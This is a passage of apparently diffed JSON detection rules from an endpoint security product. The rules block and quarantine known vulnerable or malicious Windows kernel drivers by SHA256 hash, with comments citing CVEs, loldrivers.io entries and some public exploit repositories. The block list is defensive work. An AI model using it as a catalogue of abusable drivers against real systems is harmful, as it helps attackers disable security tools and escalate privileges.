"dfafcdb644b4c02b78eaef05a352b824cad60c36f118bcb00fb3e3a9fdc8b60d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e6e2165-8dcf-56f9-99f0-b2da2e98b27c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455332Z", + "creation_date": "2026-03-23T11:45:30.455335Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455344Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b26c4678ecd37d1829513f41ff9e9df9ef1d1d6fea9e3d477353c90cc915291", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e73eafa-a53a-5ef0-85ba-a6998bac0c9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981472Z", + "creation_date": "2026-03-23T11:45:29.981474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edfc38f91b5e198f3bf80ef6dcaebb5e86963936bcd2e5280088ca90d6998b8c", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e85c7b8-e01f-5040-b48d-d58998131d7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608051Z", + "creation_date": "2026-03-23T11:45:29.608053Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608058Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c9829a16eb85272b0e1a2917feffaab8ddb23e633b168b389669339a0cee0b5", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "0e90f41d-55ed-5471-9feb-c20b9523d797", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829211Z", + "creation_date": "2026-03-23T11:45:31.829214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829224Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f35f07641f662583754d8a1ad1a457c438cc6901ae9be6d4225f61e8c1c2d0cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e912366-051c-56f7-93e4-fdbb0e28d490", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829610Z", + "creation_date": "2026-03-23T11:45:31.829612Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e9d032fc15f52433c9a7b5c079bcb110d61c87b004111617694221a58c6a98e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e9e4053-9826-50b4-8a0e-495383ba544a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835892Z", + "creation_date": "2026-03-23T11:45:30.835894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835900Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "868ffecf2f6ab6e58385d83429b014bd3214ff51393caa1dd1cb39719fc9183e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ea1c3fd-b768-5c58-af3d-397e1a10095b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490332Z", + "creation_date": "2026-03-23T11:45:31.490334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42ba46e7106efb977fc9c2a4a9859d2fb67168f19608481e93209c5a3516c7ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0eb022b3-d37e-5557-8772-fef9681d0723", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975202Z", + "creation_date": "2026-03-23T11:45:29.975204Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975209Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd688dc0e5b7b6c5e506c153d4c52ab7023b27a438423ccf77bf61be4d1971b6", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0eb22133-3a01-5ee5-ae44-dce7a2c3aa73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622776Z", + "creation_date": "2026-03-23T11:45:29.622778Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622783Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21a8aa12aa944658f05694243e4d7b9ba07ea24447b539d40977e9b7fa19fed1", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0eb7996f-0af7-509c-b6d1-458eb0fb977a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493257Z", + "creation_date": "2026-03-23T11:45:31.493259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31124ab8f3da114ab87b46dbb42758254a69c41d24a4a99416eb73295b0022a1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ebbc04a-ded6-5fa7-8480-5d93c4a24fc7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612422Z", + "creation_date": "2026-03-23T11:45:29.612424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c64d4ac416363c7a1aa828929544d1c1d78cf032b39769943b851cfc4c0faafc", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ebc7407-0cb7-5793-abd0-aecc61c5bf3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967938Z", + "creation_date": "2026-03-23T11:45:29.967940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967955Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d31118a2e92377ecb632bd722132c04af4e65e24ff87743796c75eb07cfcd71", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ebf02c3-27cb-59a9-8cdf-d10a2f02c6fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466441Z", + "creation_date": "2026-03-23T11:45:30.466444Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466452Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19dfacea1b9f19c0379f89b2424ceb028f2ce59b0db991ba83ae460027584987", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ecc43c5-540c-5e83-b96a-460b260c2dd9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611342Z", + "creation_date": "2026-03-23T11:45:29.611344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2159219e9986ab9e07e00a87fb83835230a2b99174e7f9b94096046c2dace55", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] 
[https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ecc7a9a-6c61-599b-b62d-111887236147", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489751Z", + "creation_date": "2026-03-23T11:45:31.489754Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f84bb12accc91d67a916636f3a903ab4d1b5c917b2302c112717d55dd33cc14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ed18a86-20c4-5dbc-bf69-3f2a68288627", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614963Z", + "creation_date": 
"2026-03-23T11:45:29.614965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ed604ba-056f-536d-8813-f1ae7ba2bd39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141166Z", + "creation_date": "2026-03-23T11:45:31.141168Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141173Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b942cb3421f66bdc6895200054232f2b22af6995d34a513df6259c30bf1d0d9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"0edd54dd-d2ca-58f2-800c-3f950859b34e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614232Z", + "creation_date": "2026-03-23T11:45:29.614234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d0962db9dc6879067270134801ad425c1f3e85b0dc39877c02aaa9c54aca14e", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0eeff0d9-0809-5a44-9310-f04f765bd841", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475763Z", + "creation_date": "2026-03-23T11:45:31.475767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475777Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b2bf79d88646a1a1afbb4677ca1622e3db71f1f06869fa8751ba19c5ce61134", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ef8eb06-9289-5272-b9bb-5c989acd5ba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142054Z", + "creation_date": "2026-03-23T11:45:31.142056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "639cfdb6dfe53be18dfc5974089a361c23b0ecfe0ff346bf451098b5c44b2dde", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f038925-9423-53d8-a9de-d7fbf47fc3fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604790Z", + "creation_date": "2026-03-23T11:45:29.604792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3d65e0f04514f60acaa70f934e3e888211301566415822e6326fa930a551ba1", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f0f7f17-bc8d-5ea0-a0ae-ac6f2604d7ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617483Z", + "creation_date": "2026-03-23T11:45:29.617485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a", + 
"comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f1813f7-faf0-5901-9d9e-e7eaf2038f19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495510Z", + "creation_date": "2026-03-23T11:45:31.495512Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495518Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3df8f062d6b16b4615c8d170437a8d0ce8fc2de10b812b35b2c21b6b2f9c6d96", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f1970d6-86f1-5867-a80b-d84588939106", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146294Z", + "creation_date": "2026-03-23T11:45:31.146296Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d65b29640c75a2364e22f07cd647c1bd1c441a677d79f3b8a75260b3d2dbecb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f1aabc3-b617-52dd-99e5-aec4be6abc44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 